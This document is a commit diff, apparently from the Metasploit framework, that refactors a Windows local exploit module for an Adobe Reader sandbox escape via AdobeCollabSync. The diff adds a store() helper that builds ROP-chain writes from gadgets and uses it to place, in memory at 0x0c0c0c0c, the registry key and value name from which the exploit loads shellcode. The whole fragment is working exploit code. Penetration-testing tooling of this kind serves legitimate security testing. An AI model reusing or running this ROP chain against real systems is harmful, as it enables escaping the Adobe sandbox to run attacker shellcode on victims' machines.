Fix @jlee-r7's feedback

Author: jvazquez-r7

modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb

@@ -185,6 +185,19 @@ def search_gadgets
 		vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
 	end
 
+	def store(buf, data, address)
+		i = 0
+		while (i < data.length)
+			buf << [@gadgets['pop edi # ret']].pack("V")
+			buf << [address + i].pack("V") # edi
+			buf << [@gadgets['pop ecx # ret']].pack("V")
+			buf << data[i, 4].ljust(4,"\x00") # ecx
+			buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
+			i = i + 4
+		end
+		return i
+	end
+
 	def create_rop_chain
 		mem = 0x0c0c0c0c
 
@@ -210,31 +223,13 @@ def create_rop_chain
 
 		# Put in the allocated memory the necessary data in order to read the
 		# shellcode stored in the registry
-		# The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
-		# The reg entry: shellcode
-		# The output buffer size: 0x3000
+		# 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
 		reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
-		j = 0
-		while (j < reg_key.length)
-			buf << [@gadgets['pop edi # ret']].pack("V")
-			buf << [mem + j].pack("V") # edi
-			buf << [@gadgets['pop ecx # ret']].pack("V")
-			buf << reg_key[j, 4].ljust(4,"\x00") # ecx
-			buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
-			j = j + 4
-		end
-		k = j
+		reg_key_length = store(buf, reg_key, mem)
+		# 2) The reg entry: shellcode
 		value_key = "shellcode\x00"
-		j = 0
-		while (j < value_key.length)
-			buf << [@gadgets['pop edi # ret']].pack("V")
-			buf << [mem + k + j].pack("V")         # edi
-			buf << [@gadgets['pop ecx # ret']].pack("V")
-			buf << value_key[j, 4].ljust(4,"\x00") # ecx
-			buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
-			j = j + 4
-		end
-
+		store(buf, value_key, mem + reg_key_length)
+		# 3) The output buffer size: 0x3000
 		size_buffer = 0x3000
 		buf << [@gadgets['pop edi # ret']].pack("V")
 		buf << [mem + 0x50].pack("V") # edi